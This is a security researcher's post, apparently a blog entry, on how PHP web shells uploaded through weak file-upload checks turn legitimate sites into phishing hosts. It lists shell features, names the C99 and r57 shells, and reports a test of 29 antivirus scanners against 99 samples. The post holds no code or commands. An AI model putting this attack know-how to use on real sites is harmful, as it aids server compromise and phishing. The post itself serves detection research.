Over the course of examining hundreds if not thousands of phishing sites I’ve learned that the vast majority of phishing sites are created by compromising legitimate web sites through vulnerabilities of one type or another. Most often the vulnerabilities are web applications which don’t properly check that user content is really just user content. For example, instead of uploading their avatar image to an online forum like ZeroBoard, hackers upload malicious files which they can then run on the server giving them access to the system. The application does a poor job (if any) of checking that the picture file is only a picture file.
The most often uploaded malicious files are PHP shells. A PHP shell is a PHP program which provides a hacker with access to the web server as well as many tools and features:
- Find, Edit, Rename, Download Files
- Point-and-click Directory and File Navigator
- Shell Command Execution
- PHP Statement Evaluation
- Find Vulnerable Files and Directories
- Upload / Download files from FTP Servers
- Dump MySQL Databases
- Create a proxy server
- Create a back-connect shell
- Encode / Decode Base64, URL escape encoding, etc.
- Show running processes, system name, kernel version, IP addresses, etc.
- Show PHP configuration (php.ini), safe-mode, register globals, etc.
- FTP brute-force password cracker
- Emailer (spammer)
- Self-update and self-remove
The most common PHP shells are the C99 shell from the Captain Crunch Security Team and the r57 shell from the Rush Security Team / GHC. However, some PHP shells are simple one-box forms used to enter a command which will be executed on the server.
Because PHP shells make hacking easy and phish kits are freely available, even ‘ankle-biters’ can create phishing sites. In fact, most phishing is done by criminals with only mediocre computer skills. This is unfortunate because it makes the problem seem bigger than it is and limits our ability to focus in on the really bad actors. Those of us wearing the white hats need to find solutions that make it only possible for skilled cyber-criminals to attempt scams like phishing.
One possible solution is to detect and stop malicious programs like PHP shells on web sites. Perhaps anti-virus products could be used to detect malicious files like PHP shells. Then if web hosting companies would use these anti-virus products on their servers there would be less phishing. Of course it wouldn’t stop the problem altogether, but if we can make the ‘script kiddies’ that use PHP shells go away, we can stop a lot phishing and focus in on the really really bad guys.
So do anti-virus products detect PHP shells and other hacker backdoors? It turns out that some of them do with, not a surprise, varying detection rates. It’s ironic that security vendors a huge amount of time and money seeking every phishing site so that it can be included in blacklists and collecting every piece of Windows malware that’s out there, yet they don’t execute well on preventing hackers from plying attacks that lead toward more phishing and malware.
I decided to test out anti-virus products against some PHP shells and backdoors and see exactly how they fare. I started out by collecting PHP shells and backdoors from compromised systems. The files gathered were found ‘in the wild’ and weren’t created by me or by others as proof-of-concepts. Next I submitted them to an antivirus scanning system similar to VirusTotal built by Andreas Marx and av-test.org. Note that Andreas and av-test.org did not otherwise participate in this test in any way except by allowing me to use their multi-vendor scanner. Ultimately 99 malicious PHP files were scanned by 29 anti-virus scanners plus 6 more cases where beta signatures were used.
The results are a bit disheartening, but there are some caveats worth mentioning:
Not all vendors have a Linux based product. Almost always (but not quite), the compromised system which has a PHP shell installed on it is running a version of Linux. So it’s perfectly reasonable not to detect files that generally are only used on an operating system on which your product doesn’t run.
Some anti-virus products are geared as gateway products and not file scanners. That means, that some anti-virus products might detect the HTML generated by these backdoors, identify them as unwanted web applications, and block access to the PHP shell. That’s easy enough to test, but wasn’t tested here.
Some of the PHP programs could be considered dual-use applications – used for evil or for good. That argument is some what constrained by the fact that the tested files were all from compromised web sites and nearly all were made by hackers for hackers.
Another argument is that it’s more important to focus resources on catching desktop malware. I disagree. Server compromises often lead to more desktop malware, more end-user phishing, and more distribution of spam. If every web site on the Internet were secure, almost all of the badness we see every day on the Internet would go away.
So how about it anti-virus vendors! Time to start detecting PHP backdoors?